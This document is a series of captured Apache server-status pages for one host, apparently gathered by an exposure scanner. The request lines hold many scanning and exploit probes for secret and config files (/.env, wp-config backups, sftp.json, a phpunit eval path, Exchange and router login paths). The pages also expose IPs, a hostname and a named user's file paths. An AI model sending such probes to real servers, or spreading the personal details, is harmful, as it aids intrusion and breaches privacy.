0.00004142760.00.0043.15 178.62.3.65http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-21334251210/1/2831_ 0.08100651664391470.00.0236.97 43.133.134.155http/1.1ravignon.mycloud.paris:443GET /zMLUH93A HTTP/1.1 1-21334251210/1/2757_ 0.071007254351900.00.0125.17 43.133.134.155http/1.1ravignon.mycloud.paris:443GET /news.php HTTP/1.1 1-21334251210/0/2791_ 0.001006714225310.00.0035.82 104.248.162.210http/1.1 1-21334251210/0/2888_ 0.001007414552090.00.0039.72 35.216.239.19http/1.1 1-21334251210/0/2898_ 0.00100651354291460.00.0032.37 35.216.239.19http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-21334251210/1/2786_ 0.09100601354300380.00.0247.77 43.133.134.155http/1.1ravignon.mycloud.paris:443GET /viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7 1-21334251210/2/2730_ 0.1330651124318310.00.0157.11 181.41.206.226http/1.1ravignon.mycloud.paris:443HEAD / HTTP/1.1 1-21334251210/1/2831_ 0.03004305370.00.0024.64 51.79.29.48http/1.1localhost:80GET /.env HTTP/1.1 1-21334251210/1/2810_ 0.1601344555440.00.0225.26 178.62.3.65http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-21334251210/0/2768_ 0.001151504192410.00.0040.41 51.79.29.48http/1.1 1-21334251210/0/2851_ 0.007591100044615840.00.0053.34 88.80.189.24http/1.1 1-21334251210/1/2842_ 0.0217224729800.00.0130.73 159.203.192.33http/1.1 1-21334251210/1/2807_ 0.031151514474310.00.0063.34 51.79.29.48http/1.1localhost:80POST / HTTP/1.1 1-21334251210/0/2806_ 0.00100672394569020.00.0053.12 35.216.239.19h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-21334251210/0/2757_ 0.0017204171570.00.0049.21 159.203.192.33h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-21334251210/0/2666_ 0.00100591094178290.00.0024.80 185.180.143.136http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-21334251210/0/2817_ 0.00306514315020.00.0047.92 35.216.239.19http/1.1 1-21334251210/1/2838_ 0.031049714493850.00.0035.49 51.79.29.48http/1.1localhost:80POST / HTTP/1.1 1-21334251210/0/2810_ 0.001049714245870.00.0043.00 51.79.29.48http/1.1 1-21334251210/1/2693_ 0.0510074874237050.00.0250.22 43.133.134.155http/1.1ravignon.mycloud.paris:443GET /is-bin HTTP/1.1 1-21334251210/0/2732_ 0.00134263970.00.0066.37 178.62.3.65http/1.1 2-210-0/0/3475. 0.0019121115703580.00.0044.52 167.94.145.51http/1.1localhost:80GET / HTTP/1.1 2-210-0/0/3462. 0.0019121105564370.00.0026.44 167.94.145.51http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbd4da6adb
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Thursday, 27-Jul-2023 02:52:22 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 153 Parent Server MPM Generation: 152 Server uptime: 137 days 20 hours 35 minutes 45 seconds Server load: 0.02 0.01 0.00 Total accesses: 230814 - Total Traffic: 3.1 GB - Total Duration: 44108987 CPU Usage: u334.69 s614.32 cu1407.79 cs425.52 - .0234% CPU load .0194 requests/sec - 279 B/second - 14.1 kB/request - 191.102 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02704741no0yes025000 22704742no0yes124000 Sum200 149000 _________________________.........................______W_______ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-15227047410/1/2262_ 0.011009813764640.00.0148.07 181.113.112.150http/1.1localhost:80GET / HTTP/1.1 0-15227047410/0/2291_ 0.00397623752370.00.0031.84 106.75.34.182http/1.1 0-15227047410/1/2288_ 0.02831703786770.00.0021.86 45.88.90.151http/1.1localhost:80POST /boaform/admin/formLogin HTTP/1.1 0-15227047410/0/2378_ 0.00398214578799440.00.0032.37 106.75.34.182h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-15227047410/0/2261_ 0.0024782463373420.00.0033.07 185.100.87.136http/1.1 0-15227047410/0/2317_ 0.0061113352460.00.0025.10 212.102.40.218h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-15227047410/1/2366_ 0.0624791173635930.00.0233.42 107.170.224.30http/1.1ravignon.mycloud.paris:443GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1 0-15227047410/0/2272_ 0.00203314930.00.0031.34 146.190.64.200http/1.1 0-15227047410/0/2262_ 0.00203402040.00.0022.19 146.190.64.200http/1.1 0-15227047410/0/2304_ 0.001009823392050.00.0025.30 181.113.112.150http/1.1 0-15227047410/0/2303_ 0.0083171153647960.00.0019.80 45.88.90.151http/1.1 0-15227047410/1/2317_ 0.081604418000.00.0221.33 146.190.64.200http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 0-15227047410/0/2304_ 0.00103412473572360.00.0029.17 198.199.107.71h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-15227047410/0/2208_ 0.00103411643528140.00.0018.87 18.246.26.79http/1.1ravignon.mycloud.paris:443GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1. 0-15227047410/0/2260_ 0.00103412013515990.00.0020.74 14.47.213.111http/1.1 0-15227047410/0/2288_ 0.001034123566250.00.0021.05 159.223.63.21http/1.1localhost:80GET / HTTP/1.1 0-15227047410/0/2325_ 0.001034103581160.00.0020.16 198.199.107.71h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-15227047410/0/2246_ 0.00103412633499150.00.0018.47 198.199.107.71http/1.1 0-15227047410/0/2290_ 0.001034113555230.00.0016.83 92.118.39.108http/1.1 0-15227047410/0/2271_ 0.00103412073583370.00.0030.20 213.109.202.66http/1.1ravignon.mycloud.paris:443GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-15227047410/0/2279_ 0.00103411653333480.00.0024.26 51.79.29.48http/1.1 0-15227047410/0/2289_ 0.00103411863635530.00.0023.90 94.102.61.75http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-15227047410/0/2336_ 0.00103411663509960.00.0016.18 198.199.107.71h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-15227047410/0/2240_ 0.001034123351350.00.0026.65 94.102.61.75http/1.1ravignon.mycloud.paris:443GET /core/img/favicon-touch.png HTTP/1.1 0-15227047410/0/2219_ 0.00103411563326510.00.0039.24 18.246.26.79http/1.1ravignon.mycloud.paris:443GET /109.190.179.92:443/.env HTTP/1.1 1-138-0/0/2672. 0.0011335382334110130.00.0050.70 54.37.79.75http/1.1 1-138-0/0/2649. 0.0011335381024070290.00.0051.13 45.128.232.176http/1.1 1-138-0/0/2674. 0.0011335381564085430.00.0042.90 54.37.79.75http/1.1 1-138-0/0/2619. 0.00113353814033640.00.0042.39 162.243.139.31http/1.1 1-138-0/0/2721. 0.00113353814235710.00.0036.11 162.243.139.31http/1.1localhost:80GET / HTTP/1.1 1-138-0/0/2655. 0.0011335381104187830.00.0021.43 54.37.79.75http/1.1 1-138-0/0/2692. 0.0011335389464099310.00.0031.88 185.224.128.157http/1.1 1-138-0/0/2792. 0.00113353804438360.00.0038.90 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-138-0/0/2773. 0.00113353804122570.00.0031.56 45.128.232.176http/1.1localhost:80CONNECT google.com:443 HTTP/1.1 1-138-0/0/2670. 0.0011335381034143890.00.0046.71 185.170.144.3http/1.1 1-138-0/0/2625. 0.00113353804182640.00.0056.09 139.59.42.255http/1.1localhost:80GET /aab8 HTTP/1.1 1-138-0/0/2723. 0.00113353804162390.00.0023.73 183.136.225.32http/1.1localhost:80GET /favicon.ico HTTP/1.1 1-138-0/0/2716. 0.00113353814416730.00.0024.17 198.199.93.54http/1.1localhost:80GET /druid/index.html HTTP/1.1 1-138-0/0/2668. 0.0011335381324084940.00.0039.69 20.214.233.75http/1.1 1-138-0/0/2744. 0.0011335381224370670.00.0052.69 198.199.93.54http/1.1 1-138-0/0/2756. 0.00113353814599850.00.0029.62 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 1-138-0/0/2698. 0.00113353844339840.00.0062.67 61.147.15.67http/1.1 1-138-0/0/2716. 0.00113353824482450.00.0052.52 61.147.15.67http/1.1localhost:80GET / HTTP/1.1 1-138-0/0/2674. 0.00113353824057230.00.0048.14 209.141.49.169http/1.1 1-138-0/0/2579. 0.0011335381414023590.00.0024.04 209.141.36.231http/1.1ravignon.mycloud.paris:443GET /index.php/js/core/merged-template-prepend.js?v=ccbf35ac-1 1-138-0/0/2722. 0.0011335382364205350.00.0047.32 209.141.34.187http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-138-0/0/2722. 0.001133538944339590.00.0034.63 94.102.61.75http/1.1 1-138-0/0/2705. 0.00113353804078910.00.0042.02 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 1-138-0/0/2600. 0.0011335381474064940.00.0048.19 209.141.49.169http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-138-0/0/2629. 0.00113353804108550.00.0052.35 45.128.232.62http/1.1localhost:80GET / HTTP/1.1 2-15227047420/1/2706_ 0.0161014400090.00.0138.94 212.102.40.218http/1.1 2-15227047420/1/2684_ 0.3641994169280.00.0220.95 146.190.64.200http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 2-15227047420/1/2701_ 0.0342844685370.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbd8437384
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Saturday, 08-Jul-2023 01:16:05 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 134 Parent Server MPM Generation: 133 Server uptime: 118 days 18 hours 59 minutes 28 seconds Server load: 0.08 0.03 0.00 Total accesses: 202737 - Total Traffic: 2.8 GB - Total Duration: 39253839 CPU Usage: u280.72 s511.92 cu1194 cs364.38 - .0229% CPU load .0198 requests/sec - 295 B/second - 14.6 kB/request - 193.62 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12455045no0yes124000 32455046no0yes025000 Sum200 149000 .........................___________W_____________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-123-0/0/1852. 0.00609362612933590.00.0034.91 185.233.19.19h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-123-0/0/1906. 0.00609362553095780.00.0029.25 54.37.79.75http/1.1 0-123-0/0/1881. 0.00609362882887000.00.0018.82 220.94.228.163http/1.1 0-123-0/0/1937. 0.006093628477990150.00.0025.56 220.94.228.163http/1.1 0-123-0/0/1838. 0.00609362892694870.00.0030.07 64.227.149.58http/1.1 0-123-0/0/1925. 0.0060936202729100.00.0022.67 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-123-0/0/1962. 0.00609362842907240.00.0030.57 71.6.134.234http/1.1localhost:80\x16\x03\x01 0-123-0/0/1889. 0.00609362612754150.00.0028.42 220.94.228.163http/1.1 0-123-0/0/1843. 0.00609362572783250.00.0019.68 220.94.228.163http/1.1 0-123-0/0/1877. 0.00609362922640640.00.0020.08 220.94.228.163h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-123-0/0/1882. 0.00609362982958660.00.0014.58 220.94.228.163http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-123-0/0/1899. 0.0060936203584760.00.0018.57 109.237.98.226http/1.1localhost:80GET /.env HTTP/1.1 0-123-0/0/1908. 0.00609362692966850.00.0026.90 220.94.228.163http/1.1 0-123-0/0/1823. 0.00609362542878600.00.0015.45 54.193.79.174http/1.1ravignon.mycloud.paris:443GET /tools/.env HTTP/1.1 0-123-0/0/1875. 0.006093622162787960.00.0017.03 54.193.79.174http/1.1ravignon.mycloud.paris:443GET /index.php/login HTTP/1.1 0-123-0/0/1875. 0.006093621072934660.00.0018.50 109.237.98.226http/1.1 0-123-0/0/1928. 0.006093621422994790.00.0016.96 34.77.127.183http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-123-0/0/1833. 0.00609362592695140.00.0015.91 54.193.79.174http/1.1ravignon.mycloud.paris:443GET /exapi/.env HTTP/1.1 0-123-0/0/1868. 0.0060936202836110.00.0013.20 87.236.176.199h2ravignon.mycloud.paris:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-123-0/0/1907. 0.00609362572937330.00.0027.41 162.243.139.18http/1.1 0-123-0/0/1888. 0.0060936212580230.00.0021.41 183.136.225.32http/1.1ravignon.mycloud.paris:443GET /core/img/favicon.ico HTTP/1.1 0-123-0/0/1882. 0.0060936202883330.00.0021.48 185.180.143.141http/1.1localhost:80GET /favicon.ico HTTP/1.1 0-123-0/0/1940. 0.00609362852834560.00.0012.77 185.233.19.19h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-123-0/0/1838. 0.00609362862732680.00.0024.13 220.94.228.163http/1.1 0-123-0/0/1844. 0.00609362552634940.00.0014.22 87.236.176.72h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-13324550450/0/2534_ 0.0076303813840.00.0049.90 3.80.225.62http/1.1 1-13324550450/0/2532_ 0.0076303801230.00.0050.44 3.80.225.62http/1.1 1-13324550450/0/2544_ 0.00003886250.00.0042.06 3.80.225.62http/1.1 1-13324550450/0/2480_ 0.00003814610.00.0041.55 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-13324550450/1/2582_ 0.0111213983040.00.0235.19 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-13324550450/0/2528_ 0.00004005700.00.0020.68 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-13324550450/1/2554_ 0.01013780920.00.0131.05 138.68.133.118http/1.1 1-13324550450/1/2657_ 0.02014136560.00.0038.10 138.68.133.118http/1.1 1-13324550450/1/2626_ 0.3001453865700.00.0230.67 138.68.133.118http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-13324550450/1/2541_ 0.320583837580.00.0245.96 138.68.133.118http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-13324550450/0/2498_ 0.00763603975170.00.0055.22 3.80.225.62http/1.1 1-13324550451/0/2592W 0.00003995410.00.0022.96 138.68.133.118http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-13324550450/0/2591_ 0.0076524191020.00.0023.45 3.80.225.62http/1.1 1-13324550450/0/2530_ 0.0076503867880.00.0038.84 3.80.225.62http/1.1 1-13324550450/0/2610_ 0.0076404164210.00.0051.79 3.80.225.62http/1.1 1-13324550450/0/2630_ 0.0076304371570.00.0028.80 3.80.225.62http/1.1 1-13324550450/0/2552_ 0.0076404141180.00.0061.76 3.80.225.62http/1.1 1-13324550450/0/2592_ 0.0076404300950.00.0051.72 3.80.225.62http/1.1 1-13324550450/0/2539_ 0.00764923765380.00.0047.25 3.80.225.62http/1.1 1-13324550450/0/2425_ 0.0076403793230.00.0022.83 3.80.225.62http/1.1 1-13324550450/0/2581_ 0.0076403867410.00.0046.43 3.80.225.62http/1.1 1-13324550450/0/2587_ 0.00104102890.00.0033.87 138.68.133.118h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-13324550450/0/2563_ 0.0076303796430.00.0041.01 3.80.225.62http/1.1 1-13324550450/0/2473_ 0.0076303818960.00.0047.42 3.80.225.62http/1.1 1-13324550450/0/2510_ 0.0076403891930.00.0047.17 3.80.225.62http/1.1 2-123-0/0/2208. 0.0060936223611190.00.0034.77 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 2-123-0/0/2204. 0.0060936203289350.00.0015.65 54.37.79.75http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-123-0/0/2216. 0.0060936203658560.00.0017.83 87.236.176.68http/1.1 2-123-0/0/2270. 0.006093621053636760.00.0034.91 209.38.216.230http/1.1ravignon.mycloud.p
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fbb9f6137e
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Wednesday, 28-Jun-2023 23:38:28 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 122 Parent Server MPM Generation: 121 Server uptime: 109 days 17 hours 21 minutes 50 seconds Server load: 0.00 0.01 0.00 Total accesses: 183734 - Total Traffic: 2.2 GB - Total Duration: 36442937 CPU Usage: u278.27 s479.19 cu1059.55 cs320.46 - .0225% CPU load .0194 requests/sec - 249 B/second - 12.6 kB/request - 198.346 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 12270561no0yes124000 32270562no0yes025000 Sum200 149000 ........................._______W_________________.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-120-0/0/1773. 0.0085105552821710.00.0034.40 167.94.138.124h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-120-0/0/1820. 0.00851051242945470.00.0028.71 35.195.93.98http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-120-0/0/1795. 0.008510502780080.00.0018.27 167.99.177.124http/1.1localhost:80done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-120-0/0/1853. 0.00851059377892990.00.0025.09 94.232.42.99http/1.1localhost:80\x03 0-120-0/0/1759. 0.008510502605230.00.0029.59 139.144.150.23http/1.1localhost:80GET / HTTP/1.1 0-120-0/0/1840. 0.008510502630580.00.0022.06 92.184.106.78h2ravignon.mycloud.paris:443idle, streams: 0/12/12/0/0 (open/recv/resp/push/rst) 0-120-0/0/1871. 0.008510502791970.00.0030.01 60.221.60.66http/1.1ravignon.mycloud.paris:443GET / HTTP/1.0 0-120-0/0/1801. 0.008510502649720.00.0027.68 92.184.106.78h2ravignon.mycloud.paris:443GET /apps/spreed/img/app-dark.svg HTTP/2.0 0-120-0/0/1759. 0.008510514132685330.00.0019.20 92.184.106.78h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-120-0/0/1788. 0.008510542538570.00.0019.59 139.144.150.23http/1.1localhost:80\x16\x03\x01 0-120-0/0/1791. 0.008510512841010.00.0014.08 167.99.177.124http/1.1localhost:80done, streams: 0/16/16/0/0 (open/recv/resp/push/rst) 0-120-0/0/1799. 0.008510503440410.00.0017.78 143.110.166.56http/1.1 0-120-0/0/1818. 0.00851051122847610.00.0026.41 167.99.177.124http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-120-0/0/1727. 0.008510502754760.00.0014.89 139.144.150.23http/1.1localhost:80GET /v2/_catalog HTTP/1.1 0-120-0/0/1774. 0.00851052402642570.00.0016.43 167.94.138.124http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 0-120-0/0/1798. 0.008510502846310.00.0017.95 54.37.79.75http/1.1 0-120-0/0/1834. 0.008510502857050.00.0016.37 83.97.73.89http/1.1localhost:80POST /Autodiscover/Autodiscover.xml HTTP/1.1 0-120-0/0/1752. 0.008510502575460.00.0015.44 54.37.79.75http/1.1localhost:80GET /.env HTTP/1.1 0-120-0/0/1781. 0.0085105872703920.00.0012.69 92.184.106.78h2ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/DOSSIERS%20B 0-120-0/0/1813. 0.008510502801960.00.0026.87 139.144.150.23http/1.1localhost:80GET /telescope/requests HTTP/1.1 0-120-0/0/1793. 0.008510502471930.00.0020.90 92.184.106.78h2ravignon.mycloud.paris:443idle, streams: 0/13/13/0/0 (open/recv/resp/push/rst) 0-120-0/0/1787. 0.0085105302750800.00.0020.89 92.184.106.78h2ravignon.mycloud.paris:443idle, streams: 0/11/11/0/0 (open/recv/resp/push/rst) 0-120-0/0/1852. 0.0085105752709980.00.0012.23 54.37.79.75http/1.1 0-120-0/0/1765. 0.008510512632990.00.0023.69 139.144.150.23http/1.1localhost:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-120-0/0/1762. 0.008510512547430.00.0013.51 54.37.79.75http/1.1localhost:80POST / HTTP/1.1 1-12122705610/86/2264_ 13.3031113413020.00.5120.35 159.223.102.13h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12122705610/80/2279_ 13.23413418330.03.3928.67 51.79.29.48http/1.1localhost:80POST / HTTP/1.1 1-12122705610/87/2294_ 13.23333573850.00.4735.40 159.223.102.13http/1.1 1-12122705610/74/2228_ 13.21103462910.00.5328.52 51.79.29.48http/1.1localhost:80GET /.env HTTP/1.1 1-12122705610/79/2326_ 13.2846803614570.00.5123.21 51.79.29.48http/1.1localhost:80GET /.env HTTP/1.1 1-12122705610/90/2255_ 13.3301363598380.00.7219.03 167.94.138.33http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-12122705610/85/2283_ 13.431743402260.00.4629.40 159.223.102.13http/1.1ravignon.mycloud.paris:443GET /about HTTP/1.1 1-12122705611/85/2351W 13.35003719430.00.5419.87 159.223.102.13http/1.1ravignon.mycloud.paris:443GET /server-status HTTP/1.1 1-12122705610/69/2333_ 13.364873459970.00.4122.94 159.223.102.13http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-12122705610/65/2260_ 12.903693401390.03.3932.68 159.223.102.13h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12122705610/83/2245_ 13.23203541270.00.6029.69 159.223.102.13h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12122705610/82/2296_ 13.2701013556480.00.5421.20 109.111.155.92http/1.1 1-12122705610/73/2311_ 13.073823697120.00.6321.69 159.223.102.13h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12122705610/74/2268_ 13.4211203466240.00.4818.71 159.223.102.13http/1.1ravignon.mycloud.paris:443GET /.vscode/sftp.json HTTP/1.1 1-12122705610/78/2329_ 13.31203677600.00.4337.55 159.223.102.13http/1.1 1-12122705610/79/2366_ 13.133563998450.00.5123.53 159.223.102.13http/1.1 1-12122705610/79/2281_ 13.441683696630.00.4339.70 159.223.102.13http/1.1ravignon.mycloud.paris:443GET /debug/default/view?panel=config HTTP/1.1 1-12122705610/80/2311_ 13.303623845780.00.5336.73 159.223.102.13http/1.1 1-12122705610/72/2261_ 13.2346813173280.00.4123.44 167.94.138.33h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12122705610/70/2164_ 13.4121883446390.00.4819.75 159.223.102.13http/1.1ravignon.mycloud.paris:443GET / HTTP/1.1 1-12122705610/85/2322_ 13.31213456450.00.4429.86 159.223.102.13h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12122705610/72/2290_ 13.4401273655640.00.4628.93 159.223.102.13http/1.1ravignon.mycloud.paris:443GET /v2/_catalog HTTP/1.1 1-12122705610/83/2274_ 13.4501223349880.00.4921.69 159.223.102.13http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-12122705610/73/2189_ 13.21213380080.00.6138.10 159.223.102.13http/1.1 1-12122705610/78/2253_ 13.2201093518140.00.5023.15 51.79.29.48http/1.1 2-120-0/0/2130.
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb315606c9fb5606c9fb65b9bc54
Apache Status Apache Server Status for 109.190.179.92 (via 192.168.145.253) Server Version: Apache/2.4.52 (Ubuntu) OpenSSL/3.0.2 Server MPM: event Server Built: 2023-03-08T17:32:01 Current Time: Friday, 26-May-2023 19:54:56 UTC Restart Time: Saturday, 11-Mar-2023 06:16:37 UTC Parent Server Config. Generation: 84 Parent Server MPM Generation: 83 Server uptime: 76 days 13 hours 38 minutes 18 seconds Server load: 0.05 0.01 0.00 Total accesses: 123593 - Total Traffic: 1.5 GB - Total Duration: 19228490 CPU Usage: u195.67 s340.57 cu723.35 cs220.78 - .0224% CPU load .0187 requests/sec - 248 B/second - 13.0 kB/request - 155.579 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01822025no0yes025000 11822026no0yes124000 Sum200 149000 __________________________________W_______________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-8318220250/45/1162_ 5.79812101869590.00.2729.05 161.97.163.11http/1.1 0-8318220250/34/1180_ 5.79812001797180.00.2011.88 161.97.163.11http/1.1 0-8318220250/45/1175_ 5.848117661831850.00.268.16 161.97.163.11http/1.1ravignon.mycloud.paris:443POST /web/debug/default/view HTTP/1.1 0-8318220250/33/1221_ 5.85497001781700.00.1920.94 194.180.48.85http/1.1localhost:80POST /boaform/admin/formLogin HTTP/1.1 0-8318220250/30/1171_ 5.5993005291720030.00.1722.75 35.233.62.116http/1.1 0-8318220250/40/1218_ 5.7198791351741740.00.2117.26 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-8318220250/43/1262_ 5.7698801731952930.00.2621.62 185.117.37.101http/1.1ravignon.mycloud.paris:443PROPFIND /remote.php/dav/files/Beatrice%20Ravignon/ HTTP/1.1 0-8318220250/44/1187_ 5.819879571743470.00.3013.09 161.97.163.11http/1.1ravignon.mycloud.paris:443POST /debug/default/view.html HTTP/1.1 0-8318220250/30/1133_ 5.79811901729530.00.1714.98 161.97.163.11http/1.1localhost:80POST /debug/default/view?panel=config HTTP/1.1 0-8318220250/43/1192_ 5.83812101722280.00.2615.74 161.97.163.11http/1.1localhost:80POST /%C0 HTTP/1.1 0-8318220250/33/1188_ 5.798120621832870.00.249.97 161.97.163.11http/1.1 0-8318220250/37/1161_ 5.804969581726530.00.2210.00 194.180.48.85http/1.1 0-8318220250/42/1193_ 5.83812001893950.00.2322.55 161.97.163.11http/1.1localhost:80POST /debug/default/view?panel=config HTTP/1.1 0-8318220250/47/1164_ 5.83812001855210.00.2610.93 161.97.163.11http/1.1localhost:80POST /sapi/debug/default/view HTTP/1.1 0-8318220250/35/1173_ 5.808117551755650.00.2312.47 161.97.163.11http/1.1ravignon.mycloud.paris:443POST /tool/view/phpinfo.view.php HTTP/1.1 0-8318220250/38/1183_ 5.8381211081909720.00.2314.16 161.97.163.11http/1.1ravignon.mycloud.paris:443POST / HTTP/1.1 0-8318220250/42/1200_ 5.82930111839490.00.2712.31 35.233.62.116http/1.1localhost:80GET / HTTP/1.1 0-8318220250/41/1166_ 5.83812001668760.00.2710.74 161.97.163.11http/1.1localhost:80POST /web/debug/default/view HTTP/1.1 0-8318220250/42/1174_ 5.82812211762420.00.248.95 161.97.163.11http/1.1localhost:80POST / HTTP/1.1 0-8318220250/40/1199_ 5.78812101832240.00.2016.32 161.97.163.11http/1.1localhost:80POST /debug/default/view?panel=config HTTP/1.1 0-8318220250/37/1190_ 5.7781221071646380.00.2417.15 161.97.163.11http/1.1 0-8318220250/34/1151_ 5.668121591842000.00.2115.40 161.97.163.11http/1.1 0-8318220250/34/1188_ 5.82812101752150.00.227.54 161.97.163.11http/1.1localhost:80POST /tool/view/phpinfo.view.php HTTP/1.1 0-8318220250/35/1184_ 5.5081206071714020.00.8411.85 161.97.163.11http/1.1 0-8318220250/47/1192_ 5.838119821680250.00.318.51 161.97.163.11http/1.1ravignon.mycloud.paris:443POST /wp-config.php-backup HTTP/1.1 1-8318220260/63/1563_ 8.6721132238360.00.3811.74 147.182.130.98http/1.1 1-8318220260/67/1584_ 8.840542349010.00.4520.13 147.182.130.98http/1.1ravignon.mycloud.paris:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-8318220260/64/1604_ 8.66202375550.00.4027.72 147.182.130.98h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-8318220260/62/1545_ 8.7221162380730.00.3924.10 147.182.130.98http/1.1 1-8318220260/60/1618_ 